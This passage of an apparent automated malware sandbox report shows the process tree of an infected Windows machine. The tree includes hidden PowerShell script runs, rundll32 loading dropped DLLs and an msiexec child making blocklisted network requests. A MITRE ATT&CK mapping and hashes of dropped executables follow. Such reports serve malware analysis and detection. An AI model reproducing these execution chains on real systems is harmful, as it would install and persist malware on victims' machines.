                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                              PID:4196
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KyBSzDrHYF\KyBSzDrHYF.dll" KyBSzDrHYF
                                                                                                              7⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:5372
                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KyBSzDrHYF\KyBSzDrHYF.dll" KyBSzDrHYF
                                                                                                                8⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Drops file in System32 directory
                                                                                                                PID:5504
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                              7⤵
                                                                                                                PID:5088
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                                7⤵
                                                                                                                  PID:6012
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                                  7⤵
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:4516
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                                  7⤵
                                                                                                                    PID:5496
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                                    7⤵
                                                                                                                      PID:4976
                                                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:4828
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                          1⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:1148
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                            2⤵
                                                                                                            • Drops file in System32 directory
                                                                                                            • Checks processor information in registry
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:5484
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                          1⤵
                                                                                                          • Drops file in Windows directory
                                                                                                          • Modifies Internet Explorer settings
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:4316
                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                          1⤵
                                                                                                          • Modifies Internet Explorer settings
                                                                                                          PID:4652
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:4116
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies Internet Explorer settings
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4492
                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                          1⤵
                                                                                                          • Enumerates connected drives
                                                                                                          • Drops file in Program Files directory
                                                                                                          • Drops file in Windows directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4596
                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding BAECB35B4D782E39F1D7379DD1EF572E C
                                                                                                            2⤵
                                                                                                            • Loads dropped DLL
                                                                                                            PID:5800
                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding E7F3B57648A09BA71F6DF3A5E3063EEA
                                                                                                            2⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Loads dropped DLL
                                                                                                            PID:4760
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                              3⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:4380
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5408
                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 90C8EACB519E0B69F2C9FE6173B92835 E Global\MSI0000
                                                                                                            2⤵
                                                                                                            • Loads dropped DLL
                                                                                                            PID:5008
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:6104
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                          1⤵
                                                                                                            PID:4612
                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                            1⤵
                                                                                                              PID:5228
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                              1⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5712
                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              PID:5932
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4460
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:5088
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:1400

                                                                                                            Network

                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                            Persistence

                                                                                                            Registry Run Keys / Startup Folder

                                                                                                            1
                                                                                                            T1060

                                                                                                            BITS Jobs

                                                                                                            1
                                                                                                            T1197

                                                                                                            Defense Evasion

                                                                                                            Modify Registry

                                                                                                            3
                                                                                                            T1112

                                                                                                            BITS Jobs

                                                                                                            1
                                                                                                            T1197

                                                                                                            Install Root Certificate

                                                                                                            1
                                                                                                            T1130

                                                                                                            Credential Access

                                                                                                            Credentials in Files

                                                                                                            3
                                                                                                            T1081

                                                                                                            Discovery

                                                                                                            Software Discovery

                                                                                                            1
                                                                                                            T1518

                                                                                                            Query Registry

                                                                                                            4
                                                                                                            T1012

                                                                                                            System Information Discovery

                                                                                                            4
                                                                                                            T1082

                                                                                                            Security Software Discovery

                                                                                                            1
                                                                                                            T1063

                                                                                                            Peripheral Device Discovery

                                                                                                            1
                                                                                                            T1120

                                                                                                            Remote System Discovery

                                                                                                            1
                                                                                                            T1018

                                                                                                            Collection

                                                                                                            Data from Local System

                                                                                                            3
                                                                                                            T1005

                                                                                                            Command and Control

                                                                                                            Web Service

                                                                                                            1
                                                                                                            T1102

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                              MD5

                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                              SHA1

                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                              SHA256

                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                              SHA512

                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                              MD5

                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                              SHA1

                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                              SHA256

                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                              SHA512

                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                            • C:\Program Files\Uninstall Information\ZVMZNPLUVE\ultramediaburner.exe
                                                                                                              MD5

                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                              SHA1

                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                              SHA256

                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                              SHA512

                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                            • C:\Program Files\Uninstall Information\ZVMZNPLUVE\ultramediaburner.exe
                                                                                                              MD5

                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                              SHA1

                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                              SHA256

                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                              SHA512

                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4
                                                                                                              MD5

                                                                                                              9bd290c73c295139470b5a56f8d857bb

                                                                                                              SHA1

                                                                                                              c838907b18895bc98a601e27c30b5de9acef88e7

                                                                                                              SHA256

                                                                                                              bfc8f14e57e8fe77f10ec2c420b746a75291c034dd872bc673e459ebfdac5968

                                                                                                              SHA512

                                                                                                              c8a77182ce1832fe96f35a2816120c9df00eca1aa29dce49a111f057d3583b3b25a69c88f579cc84f4ff43fbf17f663a1e07234aacdd1831bbdb443f8f234e36

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B76882588198CE25BFE5B7B047D867A1
                                                                                                              MD5

                                                                                                              f9d1e5ffc4b7909705704d94aa6a87fe

                                                                                                              SHA1

                                                                                                              dd1102b19254b0f112316e3708bb845cf01adbb5

                                                                                                              SHA256

                                                                                                              5e05fcd35205a64455a4fe0cb1f026d2a7e335f64d856b094c20ea805bf4d090

                                                                                                              SHA512

                                                                                                              e2b5bb12c4f08538c297713f3bea8f98061d9b76ec855cd2501883262329b37f6c5935de16804b7ff78d1ed2a3ac3055cad7a30410b7fba6df67f6f3e533c804

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4
                                                                                                              MD5

                                                                                                              2720438971799698463ddde65b387aa8

                                                                                                              SHA1

                                                                                                              2761d213cc749a3d44d0d6aa728b96c8298f4f44

                                                                                                              SHA256

                                                                                                              5ba024eed3b7b1b2e83a5db5e627b30ab16a60dbc70913cabff08d95f8f4af33

                                                                                                              SHA512

                                                                                                              7fc3676675355d2cad7c95adaad439488018befb4414aea792dc1e2c03804dcbdee773d7b6fc9dec93f58491e18af29fc849148703d95143a24479dc266ec04b

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B76882588198CE25BFE5B7B047D867A1
                                                                                                              MD5

                                                                                                              7c7d36fc091154b9e7c6d1b12827a4e7

                                                                                                              SHA1

                                                                                                              ac47a6676850ee2cce6762d8f684bae5986ded7f

                                                                                                              SHA256

                                                                                                              725f2c5c026a5345c1dbdccab99597e30ca3f9db0c01198bb7d350b700a3e519

                                                                                                              SHA512

                                                                                                              589e2d048365321004440ddc424c5f617198909209da2b0b095ffb141990d03a6db83a5e508140c7069604e372fd42ffd1165b32767a1731ec33a4185bf52413

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\mmow[1].htm
                                                                                                              MD5

                                                                                                              cda7467dcfe9ca830269f7ab0f79c046

                                                                                                              SHA1

                                                                                                              1fc601b507e0ce5dbe1ad428d0198b2f3c96f36a

                                                                                                              SHA256

                                                                                                              baa80fca2c2933067efc6ab65e3ed672634a01d11d1ac7c52b17d789389f03ec

                                                                                                              SHA512

                                                                                                              893d19857f06ce86fd19c7d8a91d25151493aa5401d8d3c047739e06a1f363564590cba17e3c2c11063c3b0329cfc44fb94067ca3058d6197ec68dae03350f83

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZIIA2USJ\m[1].exe
                                                                                                              MD5

                                                                                                              85e328827c414eb090a0aecdd27dbb5f

                                                                                                              SHA1

                                                                                                              c6ffbde2ae087e2b3a69fd5c005e885fd620a2fc

                                                                                                              SHA256

                                                                                                              84ed0a9eae64ed1cdf1310a3ef4fbc88620ce5f59c6f14f4591f5897e82e07e4

                                                                                                              SHA512

                                                                                                              fe40e19454a690c69cec1d361d3829cb4ca6b08c3ef05786d11c1249be3d94718f2c2315386630b8365a73d4e700065504cca56c60eb7cccf8351b45231ceefd

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\BB1F1585.cookie
                                                                                                              MD5

                                                                                                              b1c369aaab5835ab49fed49b34852067

                                                                                                              SHA1

                                                                                                              34dbeb002accc2fd1ccdf1b48bc319ca2e0e3c09

                                                                                                              SHA256

                                                                                                              28924ec284ac7ac7163588eaf53cd93f20fc21507f31aa1a491489995442c36e

                                                                                                              SHA512

                                                                                                              3d4a131eb111d545ddb2eb1b2d9ca1c11e6d03b7ead5bd96214c59b1fbe8a97d81273acbae64bf051ff17259aa90c0308116cee780b1035104a8bf66ac8e83ad

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\266360057.exe
                                                                                                              MD5

                                                                                                              85e328827c414eb090a0aecdd27dbb5f

                                                                                                              SHA1

                                                                                                              c6ffbde2ae087e2b3a69fd5c005e885fd620a2fc

                                                                                                              SHA256

                                                                                                              84ed0a9eae64ed1cdf1310a3ef4fbc88620ce5f59c6f14f4591f5897e82e07e4

                                                                                                              SHA512

                                                                                                              fe40e19454a690c69cec1d361d3829cb4ca6b08c3ef05786d11c1249be3d94718f2c2315386630b8365a73d4e700065504cca56c60eb7cccf8351b45231ceefd

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\266360057.exe
                                                                                                              MD5

                                                                                                              85e328827c414eb090a0aecdd27dbb5f

                                                                                                              SHA1

                                                                                                              c6ffbde2ae087e2b3a69fd5c005e885fd620a2fc

                                                                                                              SHA256

                                                                                                              84ed0a9eae64ed1cdf1310a3ef4fbc88620ce5f59c6f14f4591f5897e82e07e4

                                                                                                              SHA512

                                                                                                              fe40e19454a690c69cec1d361d3829cb4ca6b08c3ef05786d11c1249be3d94718f2c2315386630b8365a73d4e700065504cca56c60eb7cccf8351b45231ceefd

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2ojxxoxv.td0\001.exe
                                                                                                              MD5

                                                                                                              fa8dd39e54418c81ef4c7f624012557c

                                                                                                              SHA1

                                                                                                              c3cb938cc4086c36920a4cb3aea860aed3f7e9da

                                                                                                              SHA256

                                                                                                              0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

                                                                                                              SHA512

                                                                                                              66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2ojxxoxv.td0\001.exe
                                                                                                              MD5

                                                                                                              fa8dd39e54418c81ef4c7f624012557c

                                                                                                              SHA1

                                                                                                              c3cb938cc4086c36920a4cb3aea860aed3f7e9da

                                                                                                              SHA256

                                                                                                              0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

                                                                                                              SHA512

                                                                                                              66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\41-d8221-9a1-04d97-ebe3a50f32b70\Kenessey.txt
                                                                                                              MD5

                                                                                                              97384261b8bbf966df16e5ad509922db

                                                                                                              SHA1

                                                                                                              2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                              SHA256

                                                                                                              9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                              SHA512

                                                                                                              b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\41-d8221-9a1-04d97-ebe3a50f32b70\Vucivelishe.exe
                                                                                                              MD5

                                                                                                              3d941b0fea60cf411176013425a45984

                                                                                                              SHA1

                                                                                                              0a940f0f0579cef5d6cc7099ab8e78f9aae208b1

                                                                                                              SHA256

                                                                                                              65bc09b9a858b11558583f9d5812c8207a97f3b7c0e62caaa98d709affba4e7d

                                                                                                              SHA512

                                                                                                              d4fe2eeda252f6ddfd3712732b162ba7c76bc1af6f87b61a4b1d7dd6f1883b67152882dbf76126a41a8f20bb950a563f395bc73decb3edfe57368466e62fa59d

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\41-d8221-9a1-04d97-ebe3a50f32b70\Vucivelishe.exe
                                                                                                              MD5

                                                                                                              3d941b0fea60cf411176013425a45984

                                                                                                              SHA1

                                                                                                              0a940f0f0579cef5d6cc7099ab8e78f9aae208b1

                                                                                                              SHA256

                                                                                                              65bc09b9a858b11558583f9d5812c8207a97f3b7c0e62caaa98d709affba4e7d

                                                                                                              SHA512

                                                                                                              d4fe2eeda252f6ddfd3712732b162ba7c76bc1af6f87b61a4b1d7dd6f1883b67152882dbf76126a41a8f20bb950a563f395bc73decb3edfe57368466e62fa59d

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\41-d8221-9a1-04d97-ebe3a50f32b70\Vucivelishe.exe.config
                                                                                                              MD5

                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                              SHA1

                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                              SHA256

                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                              SHA512

                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\478699307.exe
                                                                                                              MD5

                                                                                                              85e328827c414eb090a0aecdd27dbb5f

                                                                                                              SHA1

                                                                                                              c6ffbde2ae087e2b3a69fd5c005e885fd620a2fc

                                                                                                              SHA256

                                                                                                              84ed0a9eae64ed1cdf1310a3ef4fbc88620ce5f59c6f14f4591f5897e82e07e4

                                                                                                              SHA512

                                                                                                              fe40e19454a690c69cec1d361d3829cb4ca6b08c3ef05786d11c1249be3d94718f2c2315386630b8365a73d4e700065504cca56c60eb7cccf8351b45231ceefd

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\478699307.exe
                                                                                                              MD5

                                                                                                              85e328827c414eb090a0aecdd27dbb5f

                                                                                                              SHA1

                                                                                                              c6ffbde2ae087e2b3a69fd5c005e885fd620a2fc

                                                                                                              SHA256

                                                                                                              84ed0a9eae64ed1cdf1310a3ef4fbc88620ce5f59c6f14f4591f5897e82e07e4

                                                                                                              SHA512

                                                                                                              fe40e19454a690c69cec1d361d3829cb4ca6b08c3ef05786d11c1249be3d94718f2c2315386630b8365a73d4e700065504cca56c60eb7cccf8351b45231ceefd

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4cwblfu0.qzh\installer.exe
                                                                                                              MD5

                                                                                                              cd5e5ff81c7acf017878b065357f3568

                                                                                                              SHA1

                                                                                                              096900f55df446b72f9237f80aaf090001afa2a2

                                                                                                              SHA256

                                                                                                              7eadd0ce64f3bfad81459a33a6f12521126b67a69dc19160e2ada42d50b4a3c3

                                                                                                              SHA512

                                                                                                              1cf3d72f09827b5ea5f0ab4560032a09007845f615b18ea5a1d0eac697b100e88967db2b42ce6c36a957246ba8d011b0881c45bff37eed42b9803db687d9f1c3

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4cwblfu0.qzh\installer.exe
                                                                                                              MD5

                                                                                                              cd5e5ff81c7acf017878b065357f3568

                                                                                                              SHA1

                                                                                                              096900f55df446b72f9237f80aaf090001afa2a2

                                                                                                              SHA256

                                                                                                              7eadd0ce64f3bfad81459a33a6f12521126b67a69dc19160e2ada42d50b4a3c3

                                                                                                              SHA512

                                                                                                              1cf3d72f09827b5ea5f0ab4560032a09007845f615b18ea5a1d0eac697b100e88967db2b42ce6c36a957246ba8d011b0881c45bff37eed42b9803db687d9f1c3

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\df-f5d69-855-c1ca3-fc74e338e61f3\Sipegalulae.exe
                                                                                                              MD5

                                                                                                              ffbe9ff871f978e3d0e556e0e7d22c39

                                                                                                              SHA1

                                                                                                              cbc299a20c80e0f2e7d54cd53acca2efec694f70

                                                                                                              SHA256

                                                                                                              bd652e421242ae91f652aa236c7fc3202e9f691d1e0b351c1b5e1211481899cd

                                                                                                              SHA512

                                                                                                              4f2b6aef5128c43f94e27326f8e53e0b9d46ca1b698999575ac8d5368d49d8a529601ca58ba84c01bf2f48830da9e58ea05ff5a93bfb4eb6bb59755239da989c

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\df-f5d69-855-c1ca3-fc74e338e61f3\Sipegalulae.exe
                                                                                                              MD5

                                                                                                              ffbe9ff871f978e3d0e556e0e7d22c39

                                                                                                              SHA1

                                                                                                              cbc299a20c80e0f2e7d54cd53acca2efec694f70

                                                                                                              SHA256

                                                                                                              bd652e421242ae91f652aa236c7fc3202e9f691d1e0b351c1b5e1211481899cd

                                                                                                              SHA512

                                                                                                              4f2b6aef5128c43f94e27326f8e53e0b9d46ca1b698999575ac8d5368d49d8a529601ca58ba84c01bf2f48830da9e58ea05ff5a93bfb4eb6bb59755239da989c

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\df-f5d69-855-c1ca3-fc74e338e61f3\Sipegalulae.exe.config
                                                                                                              MD5

                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                              SHA1

                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                              SHA256

                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                              SHA512

                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              MD5

                                                                                                              b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                              SHA1

                                                                                                              d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                              SHA256

                                                                                                              fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                              SHA512

                                                                                                              98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              MD5

                                                                                                              b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                              SHA1

                                                                                                              d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                              SHA256

                                                                                                              fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                              SHA512

                                                                                                              98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              MD5

                                                                                                              b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                              SHA1

                                                                                                              d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                              SHA256

                                                                                                              fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                              SHA512

                                                                                                              98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\gh10ietq.et2\google-game.exe
                                                                                                              MD5

                                                                                                              531020fb36bb85e2f225f85a368d7067

                                                                                                              SHA1

                                                                                                              a5f78a41f1544fa3da0836fb453cf558c2fce846

                                                                                                              SHA256

                                                                                                              370dcae16de62c8cec5f7bf4366ddc62a44f526b31b905a7f4d97bbe3d41fe11

                                                                                                              SHA512

                                                                                                              864f1523a984da68aea9ef58e2ef9738ea47cc16ca4cb3f80d598abb09246f2517d5225324f1dd27aa38000e8e2f1642de1a20dfefc6203e558898a7b43f705e

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\gh10ietq.et2\google-game.exe
                                                                                                              MD5

                                                                                                              531020fb36bb85e2f225f85a368d7067

                                                                                                              SHA1

                                                                                                              a5f78a41f1544fa3da0836fb453cf558c2fce846

                                                                                                              SHA256

